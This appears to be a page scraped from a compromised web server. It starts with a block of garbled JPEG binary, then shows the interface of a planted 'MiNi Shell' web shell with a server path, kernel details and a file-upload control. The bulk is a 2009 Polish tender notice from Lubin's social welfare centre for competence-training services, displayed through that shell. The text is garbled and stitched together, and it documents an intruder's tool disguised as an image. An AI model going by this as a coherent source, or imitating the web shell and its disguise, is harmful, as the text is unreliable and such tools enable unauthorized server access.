JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090505/70905-N-2009.html

<p class="kh_header"><b>Lubin: Trening kompetencji społecznych oraz 
Trening kompetencji zawodowych
w ramach projektu systemowego ,-Aktywność miarą sukcesu- współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 70905 - 2009; data zamieszczenia: 05.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Jana Kilińskiego 25 A, 59-300 Lubin, woj. dolnośląskie, tel. 076 74-63-400, faks 076 74-63-401.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.lubin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Trening kompetencji społecznych oraz 
Trening kompetencji zawodowych
w ramach projektu systemowego ,-Aktywność miarą sukcesu- współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część pierwsza: Przedmiotem zamówienia jest przeprowadzenie treningów kompetencji społecznych.
1.Treningi winny być przeprowadzone przez: doświadczonego psychologa lub psychologa - terapeutę oraz pedagoga. Kadra dydaktyczna powinna posiadać uprawnienia do prowadzenia zajęć oraz praktykę w tym zakresie. Na dowód tego Wykonawca ubiegający się o niniejsze zamówienie załączy do oferty dokument potwierdzający posiadanie ww. kwalifikacji ( np. dyplomy, świadectwa, zaświadczenia, certyfikaty) oraz posiadanie doświadczenia wraz
z wykazem osób, które będą przeprowadzać treningi.
2. Wykonawca  musi być zarejestrowany w Internetowej Bazie Ofert Szkoleniowych.
3.Celem treningów kompetencji społecznych jest zwiększenie poziomu kompetencji społecznych tj. podniesienie samooceny, poczucia własnej wartości i motywacji, stworzenia uczestnikom szans powrotu do pełnego życia społecznego poprzez:
uświadomienie co to jest samowiedza i jak ją wykorzystać,
poznanie typu swoich potrzeb i zainteresowań,
uświadomienie swoich mocnych i słabych stron, diagnoza własnych zasobów,
określenie i uświadomienie sobie wyznaczonych wartości,
nabycie umiejętności komunikacyjnych i interpersonalnych,
identyfikację wartości życiowych,nabycie umiejętności zachowań asertywnych, radzenia sobie ze stresem i zachowaniami agresywnymi,
nabycie umiejętności zarządzania czasem i dokonywania zmian.
Część druga: Przedmiotem zamówienia jest przeprowadzenie treningów kompetencji zawodowych.
1.Treningi winny być przeprowadzone przez: doświadczonego psychologa lub psychologa - terapeutę oraz doradcę zawodowego. Kadra dydaktyczna powinna posiadać uprawnienia do prowadzenia zajęć oraz praktykę w tym zakresie. Na dowód tego Wykonawca ubiegający się o niniejsze zamówienie załączy do oferty dokument potwierdzający posiadanie ww. kwalifikacji ( np. dyplomy, świadectwa, zaświadczenia, certyfikaty) oraz praktyki wraz z wykazem osób, które będą przeprowadzać treningi.
2. Wykonawca  musi być zarejestrowany w Internetowej Bazie Ofert Szkoleniowych.
3. Celem treningów kompetencji zawodowych jest zwiększenie poziomu kompetencji zawodowych	uczestników, oraz zwiększenie szansy powrotu na rynek pracy, podniesienie umiejętności	poruszania się po rynku pracy poprzez:
poznanie własnych umiejętności i możliwości,
identyfikację wartości życiowych i wartości związanych z pracą,
zmianę sposobu myślenia o sobie i postrzegania siebie,
określenie swoich ograniczeń i oczekiwań w zakresie pracy zawodowej,
nabycie umiejętności napisania  życiorysu ( CV ) i listu motywacyjnego,
podniesienie umiejętności związanych z poszukiwaniem pracy,
nabycie umiejętności autopromocji i autoprezentacji,
poznanie rynku pracy.
Część wspólna: Informacje wspólne dla treningu kompetencji społecznych i treningu kompetencji zawodowych.
1.  Liczba uczestników - 40 osób
2. Zajęcia grupowe winny być przeprowadzone w grupach  20 osobowych, w godzinach od 08.00 do 15.00  ( godziny lekcyjne 45 minut), w dni robocze od poniedziałku do piątku.  Łącznie dla obu grup 60 godzin treningu  kompetencji społecznych  oraz  60 godzin treningów kompetencji zawodowych. 
3. Zajęcia indywidualne winny odbywać się po 2 godziny dydaktyczne ( 45 minut) na osobę ( dla 40 osób), 80 godzin dla treningów kompetencji społecznych i 80 godzin dla treningów kompetencji zawodowych, łącznie 160 godzin dydaktycznych dla obu treningów (w godzinach i dniach ustalonych przez prowadzącego i uczestnika)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.42.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Uczestniczenie w przetargu jest otwarte, na jednakowych warunkach dla wszystkich  osób fizycznych i prawnych oraz wykonawców wspólnie ubiegających się o udzielenie zamówienia, którzy spełniają wymogi określone w art. 22 ust. 1 ustawy.
2.Do uczestniczenia w przetargu nie będą dopuszczeni wykonawcy wykluczeni
z  udziału  w  postępowaniu na mocy przepisów art. 24 ust. 1 i 2 ustawy.
3.Posiadanie uprawnień do wykonywania określonej działalności lub czynności.
4.Posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania przedmiotu zamówienia.
5.O dopuszczeniu do udziału w postępowaniu lub wykluczeniu z niego a także o dokonaniu oceny spełniania wszystkich warunków decydować będzie Komisja przetargowa na podstawie oświadczeń i dokumentów dołączonych do oferty, a wymienionych w cz. IX  SIWZ. Oświadczenia sporządzone przez składających ofertę podpisane muszą być przez osoby upoważnione do reprezentowania Wykonawcę z datą złożenia lub przesłania oferty.
6.Kryteria dopuszczenia do uczestnictwa w przetargu lub wykluczenia z niego obowiązują wszystkich ubiegających się o udzielenie zamówienia, wszystkich partnerów występujących wspólnie i wszystkich podwykonawców.
7.Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie przedmiotu zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Oświadczenie Wykonawcy, że spełnia wszystkie warunki określone przepisami
art. 22 ust. 1 ustawy i o nie podleganiu wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy -na formularzu wg załączonego wzoru nr 3 do SIWZ                              2.Zaakceptowany -Wzór umowy- na formularzu wg załączonego wzoru nr 4  do SIWZ
3.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej- wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert-uprawnienie do występowania w obrocie prawnym, określające formę prawną lub status prawny, miejsce rejestracji oraz siedzibę, itp.
4.Imienny wykaz osób, które będą uczestniczyć w wykonaniu zamówienia tj. psychologa lub psychologa - terapeutę, pedagoga oraz doradcę zawodowego. Wykaz powinien zawierać: imię i nazwisko, wykształcenie, kwalifikacje zawodowe-uprawnienia-, doświadczenie niezbędne do wykonania zamówienia. I na dowód tego Wykonawca dołączy do oferty:
a.dokumenty potwierdzające min. 3 letni staż  pracy  w zawodzie wymienionym 
w niniejszym pkt tj. psychologa lub psychologa - terapeuty, pedagoga oraz doradcę zawodowego -umowy o pracę,  umowy zlecenia, świadectwa pracy, itp.
b.referencje, opinie  z ostatnich 2 lat -min. 2- potwierdzające wykonanie przez daną osobę  zajęć grupowych,
c.dyplomy, świadectwa, zaświadczenia certyfikaty potwierdzające kwalifikacje osób, które będą wykonywały przedmiot zamówienia.
Dokumenty, o których mowa w niniejszym pkt. muszą być potwierdzone za zgodność z oryginałem.
5.Wykaz wykonanych usług w okresie 2 lat przed dniem złożenia oferty. Do wykazu należy dołączyć dokumenty potwierdzające, iż usługi zostały wykonane z należytą starannością.
6.Szczegółowy harmonogram z uwzględnieniem osób, które będą prowadziły zajęcia oraz rodzaj i tematyka zajęć oraz plan zajęć;
7.Kalkulacja kosztów usługi z uwzględnieniem kosztu 1 osoby..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mops.lubin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej, 59-300 Lubin, ul. Kilińskiego 25a, pok.207.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2009 godzina 13:00, miejsce: Miejski Ośrodek Pomocy Społecznej, 59-300 Lubin, ul. Kilińskiego 25a, pok.127.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com